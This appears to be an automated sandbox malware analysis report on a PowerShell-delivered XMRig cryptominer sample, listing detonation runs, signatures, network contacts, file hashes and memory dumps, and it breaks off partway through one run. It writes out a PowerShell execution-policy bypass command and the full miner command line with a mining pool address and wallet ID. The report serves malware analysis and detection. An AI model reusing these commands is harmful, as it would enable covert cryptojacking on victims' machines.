Malware Analysis Report

2025-04-19 19:06

Sample ID 240526-qtz8tagc81
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags xmrig execution miner
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral14, behavioral17, behavioral29, behavioral5, behavioral8, behavioral22, behavioral26, behavioral31, behavioral7, behavioral25, behavioral3, behavioral9, behavioral10, behavioral11, behavioral21, behavioral23, behavioral28, behavioral4, behavioral6, behavioral13, behavioral16, behavioral27, behavioral2, behavioral15, behavioral18, behavioral30, behavioral1, behavioral12, behavioral19, behavioral20, behavioral24, behavioral32 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score 10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(62 hits recorded; Description, Indicator, Process and Target are all N/A in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/2736-3-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-5-0x000001E26A650000-0x000001E26A672000-memory.dmp

memory/2736-8-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-9-0x000001E26A950000-0x000001E26A9C6000-memory.dmp

memory/2736-10-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qiqycppp.5zi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2736-25-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-61-0x000001E26A6E0000-0x000001E26A6EA000-memory.dmp

memory/2736-48-0x000001E26A700000-0x000001E26A712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2716-90-0x000001A6ED0F0000-0x000001A6ED110000-memory.dmp

memory/2716-91-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-92-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2736-93-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-94-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-95-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-96-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2716-97-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-98-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-99-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-100-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-101-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-102-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-103-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-104-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-105-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-106-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-107-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-108-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-109-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-110-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-111-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-112-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-113-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-114-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-115-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-116-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-117-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-118-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-119-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-120-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-121-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-122-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-123-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-124-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-125-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-126-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-127-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-128-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-129-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-130-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-131-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-132-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-133-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-134-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-135-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-136-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-137-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-138-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-139-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-140-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-141-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-142-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-143-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-144-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-145-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-146-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-147-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-148-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-149-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-150-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-151-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-152-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-153-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-154-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-155-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-156-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

memory/2716-157-0x00007FF70F680000-0x00007FF7102B3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:52

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/2812-12-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-8-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

memory/2812-6-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2812-5-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2812-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits recorded; Description, Indicator, Process and Target are all N/A in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/3968-0-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-5-0x000002A6599B0000-0x000002A6599D2000-memory.dmp

memory/3968-8-0x000002A672030000-0x000002A6720A6000-memory.dmp

memory/3968-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtg2x3hh.ro5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3968-20-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-48-0x000002A671ED0000-0x000002A671EE2000-memory.dmp

memory/3968-61-0x000002A659A00000-0x000002A659A0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4816-90-0x000002177A1E0000-0x000002177A200000-memory.dmp

memory/4816-91-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/3968-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/4816-94-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-95-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-96-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-97-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-98-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-99-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-100-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-101-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-102-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-103-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-104-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-105-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-106-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-107-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-108-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-109-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-110-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-111-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-112-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-113-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-114-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-115-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-116-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-117-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-118-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-119-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-120-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-121-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-122-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-123-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-124-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-125-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-126-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-127-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-128-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-129-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-130-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-131-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-132-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-133-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-134-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-135-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-136-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-137-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-138-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-139-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-140-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-141-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-142-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-143-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-144-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-145-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-146-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-147-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-148-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-149-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-150-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-151-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-152-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-153-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-154-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

memory/4816-155-0x00007FF625BB0000-0x00007FF6267E3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win7-20240221-en

Max time kernel

1560s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

memory/2904-4-0x000007FEF4FCE000-0x000007FEF4FCF000-memory.dmp

memory/2904-5-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2904-7-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-6-0x0000000002690000-0x0000000002698000-memory.dmp

memory/2904-8-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-9-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-10-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-11-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2904-12-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits recorded; Description, Indicator, Process and Target are all N/A in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/416-0-0x00007FFBF9313000-0x00007FFBF9315000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tyffof3.og2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/416-9-0x000001A235AC0000-0x000001A235AE2000-memory.dmp

memory/416-10-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-11-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-12-0x00007FFBF9310000-0x00007FFBF9DD2000-memory.dmp

memory/416-14-0x000001A235B50000-0x000001A235B62000-memory.dmp

memory/416-15-0x000001A235B40000-0x000001A235B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

